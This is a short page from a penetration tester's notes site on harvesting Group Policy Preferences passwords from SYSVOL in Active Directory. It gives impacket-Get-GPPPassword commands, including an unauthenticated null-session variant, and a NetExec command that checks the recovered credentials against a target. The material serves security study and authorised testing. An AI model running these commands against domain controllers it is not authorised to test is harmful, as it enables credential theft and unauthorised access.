yuyudhn's notes
  • About
  • 🚉QUICKSTART
    • Prerequisite
    • Reconnaissance
    • Exploitation
    • Post Exploitation
    • ⛈️Misc
  • 🪟Active Directory
    • Basic Command
    • Enumeration
      • PowerView
    • Service Exploitation
      • LDAP
      • SMB
        • MS17-010
      • MSSQL
    • Privilege Escalation
      • Unquoted Service Path
      • UAC Bypass
      • Token Abuse
    • Post Exploitation
      • Tunneling with Ligolo-ng
    • Credential Hunting
      • Group Policy Preferences
      • DPAPI
  • MITRE ATT&CK
    • Defense Evasion
      • Physical Attack: Remove EDR
      • AMSI Bypass
    • Credential Access
      • Dump SAM Hashes via Registry
  • 🐧Linux
    • Misc
    • Linux Post Exploitation
    • Linux Password Hunting
  • 🐚Backdoor Stuff
    • Simple PHP Webshell
    • MSFvenom Generate Payload
  • 📳Mobile Pentest: iOS
    • iOS Penetration Testing
    • Objection
  • 🕸️Web Application
    • Common Applications
      • Tomcat
      • Joomla
    • SSTI
    • File Inclusion
    • XSS
    • Misc
  • 🖊️Machine Writeup
    • HackTheBox
      • Perfection
      • Pilgrimage
      • PC
      • Shoppy
      • GoodGames
      • Photobomb
      • Support
Powered by GitBook
On this page

Was this helpful?

  1. Active Directory
  2. Credential Hunting

Group Policy Preferences

Finding Passwords in SYSVOL & Exploiting Group Policy Preferences

PreviousCredential HuntingNextDPAPI

Last updated 7 months ago

Was this helpful?

There is already bunch of article that discuss about this topic. Some of them are:

  • https://adsecurity.org/?p=2288

  • https://podalirius.net/en/articles/exploiting-windows-group-policy-preferences/

  • https://podalirius.net/en/articles/exploiting-windows-group-policy-preferences/

The quickest way to hunting credentials from GPP is using impacket-Get-GPPPassword.

# with a NULL session
impacket-Get-GPPPassword -no-pass 'DOMAIN_CONTROLLER'
# with cleartext credentials
impacket-Get-GPPPassword 'DOMAIN'/'USER':'PASSWORD'@'DOMAIN_CONTROLLER'
cPassword

And then, you can verify the credentials using NetExec or Evil-WinRM.

netexec smb TARGET -u 'username' -p 'password'
🪟